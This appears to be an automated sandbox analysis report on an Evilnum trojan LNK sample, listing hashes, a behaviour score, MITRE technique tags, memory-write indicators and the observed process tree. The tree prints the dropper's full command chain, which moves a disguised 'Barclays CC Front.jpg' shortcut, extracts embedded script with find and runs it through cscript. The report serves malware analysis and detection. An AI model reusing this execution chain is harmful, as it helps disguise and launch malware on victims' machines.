evilnum | bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028

Analysis

Target

bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk
Size

83KB
MD5

42a0e13c97e0aa0867f769b71e378d24
SHA1

c7575dccc6d1a228393e9ac0840a4c10bb4c1fb2
SHA256

bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028
SHA512

8106fb31144357c1e3ef61c74157ab60e5f81515d6c831347da09aae68c38fcb2cb58ae74758af1f4db32e590abf123c430821d86016191bedcdf579fbc59f0b

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1592 wrote to memory of 1804	1592	cmd.exe	28
PID 1592 wrote to memory of 1804	1592	cmd.exe	28
PID 1592 wrote to memory of 1804	1592	cmd.exe	28
PID 1804 wrote to memory of 1136	1804	cmd.exe	29
PID 1804 wrote to memory of 1136	1804	cmd.exe	29
PID 1804 wrote to memory of 1136	1804	cmd.exe	29
PID 1804 wrote to memory of 1792	1804	cmd.exe	30
PID 1804 wrote to memory of 1792	1804	cmd.exe	30
PID 1804 wrote to memory of 1792	1804	cmd.exe	30
PID 1804 wrote to memory of 1840	1804	cmd.exe	31
PID 1804 wrote to memory of 1840	1804	cmd.exe	31
PID 1804 wrote to memory of 1840	1804	cmd.exe	31
PID 1804 wrote to memory of 1848	1804	cmd.exe	32
PID 1804 wrote to memory of 1848	1804	cmd.exe	32
PID 1804 wrote to memory of 1848	1804	cmd.exe	32
PID 1804 wrote to memory of 1824	1804	cmd.exe	33
PID 1804 wrote to memory of 1824	1804	cmd.exe	33
PID 1804 wrote to memory of 1824	1804	cmd.exe	33

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bb579920513264854cb4ff08d86eb4ee6c2ade66ca14abd9752320053a1a7028.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:1592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "Barclays CC Front.jpg*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "RDE3">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1804
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "Barc*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:1136
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:1792
- - C:\Windows\system32\find.exe
    find "RDE3"
    3⤵
    PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:1848
- - C:\Windows\system32\cscript.exe
    cScrIPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1824

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/1592-53-0x000007FEFBE11000-0x000007FEFBE13000-memory.dmp

Filesize
8KB

Download